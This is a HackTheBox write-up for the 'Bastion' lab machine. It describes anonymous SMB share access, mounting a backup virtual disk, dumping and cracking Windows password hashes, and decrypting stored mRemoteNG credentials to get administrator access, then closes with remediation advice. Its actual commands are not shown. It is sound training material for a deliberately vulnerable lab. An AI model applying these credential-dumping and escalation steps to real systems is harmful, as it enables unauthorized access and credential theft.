HackTheBox : Bastion
Summary
To solve this box, we first enumerated the open ports on the target machine using nmap. We found that the SMB port was open, therefore we enumerated the shares. From there, we have been able to access anonymously the Backups share on which we downloaded a virtual disk image that allowed us to retrieve users passwords’ NT hashes and get an initial foothold. After that, we took advantage of an installed program on the target system to escalate our privileges.
Reconnaissance
Nmap
Based on the output, we can notice that the SMB port (tcp/445) is open and it allows guest authentication. Therefore, let’s check if we have permissions over certain shares. We do that because it’s always good practice to look first for the low hanging fruits.
SMB
Let’s first list the shares and their respective permissions using smbmap :
FYI, the -q flag is used to exclude shares on which we have no access.
As you can see, we have read and write permissions over the Backups share. Let’s try to display its content recursively :
Among the files listed above, one file stands out. It’s the note.txt file which has different permissions. Let’s download it, then take a look at its content :
Interesting ! The sysadmins are warning us to not transfer the entire backup file locally because it’s going to take too much time. Therefore, let’s mount the backups share on our system. For that, we are going to use mount.cifs command which is used to mount a CIFS or SMB3 filesystem :
-o user=,passwd= is used to specify mount options. In our case, we specified a empty username and password as options.
Once done, let’s browse the mounted filesystem to see if you can find any valuable information :
Great ! We found two virtual hard disks.
A virtual hard disk (VHD) is a disk image file format for storing the entire contents of a computer’s hard drive. The disk image, sometimes called a virtual machine, replicates an existing hard drive, including all data and structural elements (source : techtarget).
Let’s mount them from our attacker machine. To do that, we first need to install the libguestfs-tools using apt install libguestfs-tools command. Once done, let’s mount the biggest .vhd file using guestmount .
It is a command used to mount a guest filesystem on the host :
Here is a quick explanation of the guestmount’s flags :
-a : add a virtual disk image (.vhd file)
-i : inspect the virtual disk looking for an operating system, then mount the filesystem.
-r : mount the virtual disk on read-only mode.
After successfully mounted the virtual disk, we can examine the files within the virtual machine as root user.
Note : We’re able to browse the files within the mounted virtual machine because the virtual hard disk has not been encrypted.
Initial Access
In this section, we’re going to perform an initial recon in the virtual machine. In Windows environments, passwords are stored in a hashed format in registry hives like SAM (Security Account Manager) and SECURITY.
SAM and LSA secrets can be dumped either locally or remotely from the mounted registry hives. These secrets can also be extracted offline from the exported hives.
Notes :
1/ The SAM file is encrypted with a key called syskey which is stored in the SYSTEM file. That’s why we need both the SAM and SYSTEM files to successfully dump the hashes.
2/ The SAM, SECURITY and SYSTEM files are generally locked when the system is running, but this won’t be an issue in our scenario see that we are using a mounted disk.
These files can be retrived from the c:\windows\System32\config folder :
Great ! Let’s now dump the hashes using the samdump2 command that is installed by default on Kali. This command takes in input the SYSTEM and SAM files, then retrieve the syskey from the SYSTEM file and extract hashes from the SAM database.
We could also use impacket’s secretsdump command :
Let’s try to dump the LSA secrets using the SECURITY and SYSTEM files :
As you can see, we have found a juicy information regarding the default password. Though, we don’t known the user to whom belongs this password, we can use it against the different users of the target system.
Well, we have two pieces of information to our disposal namely the NT hashes and the default password.
Knowing that the winrm port (tcp/5985) is open, let’s try to get an initial foothold to the target system by performing a pass-the-hash attack against the user L4mpje. To do that, we will use L4mpje password’ NT hash and evil-winrm :
Unfortunately, it didn’t work. Therefore, I tried again to login using this time the default password rather than the hash :
Note : You might think of PsExec but it won’t work see that we have no access the ADMIN$ share.
After multiple failed login attempts, I tried to crack the L4mpje password’s NT hash using this resource :
Awesome! We have been able to obtain the plain text password of the user L4mpje. This is identical to the default password we got from the LSA dump.
Let’s try to get an initial foothold using this time ssh :
Fantastic! We have an initial access to the target machine. Let’s retrieve the user flag in the Desktop folder :
Great! We need now to escalate our privileges in order to have full control over the machine.
Privilege Escalation
While enumerating the installed programs on the compromised machine, one program particularly caught my eye :
By doing some research, mRemoteNG (Multi-Remote Next Generation Connection Manager) is a remote connection session manager for windows. It supports several protocols such as : rdp, ssh, vnc, rlogin, telnet, etc. Furthermore, it saves information like the IP address, username and password in an xml configuration file ‘confCons.xml’ located at c:\users\%user%\AppData\Roaming\mRemoteNG.
However, the issue with saving these information in the configuration file is that some information like the users’ encrypted passwords can easily be decrypted using public available online tools. As far as I’m concerned, I use this script :
Wonderful ! We decrypted the administrator user’s password.
Note: The mRemote-NG program is also using an outdated version of the software as you can see in the image below :
The latest version as I am writing this writeup is v1.76.20.
Well, before connecting to the administrator account, let’s first check if it’s active :
Knowing that the administrator account is active, let’s connect to it using ssh and the decrypted password :
Excellent! Now that we have full control over the target system, we can retrieve the root flag located in the Desktop folder :
Remediations
Here are some recommendations to fix the vulnerabilities we exploited :
1/ Unauthorized Access
To gain an initial access to the target machine, we mounted a virtual disk image from the Backups smb share that is fully accessible (read/write permissions) to anyone without any restriction. After that, we dumped L4mpje’s password hash and cracked it using an online service. Once done, we have been able to successfully log into his account. One way to fix this vulnerability consists of implementing strong authentication before allowing a user to access any share. Furthermore, it is recommended to encrypt files such as virtual disk images see that they can contain sensitive information such as passwords’ hashes.
2/ Encryption Failure
To escalate our privileges, we took advantage of the way mRemote-NG stored users’ information in its configuration file. Indeed, it uses poorly encrypted passwords. Therefore, to exploit that we used a python script that we downloaded from Github. To fix that vulnerability, make sure to install the latest version of the software here.
Wrapping Up
That’s it guys. Congrats on having made it so far 👏.
I hope you enjoyed the writeup.
If so, do not forget to click on the little clap icon below and subscribe to my newsletter to keep up with my latest articles.
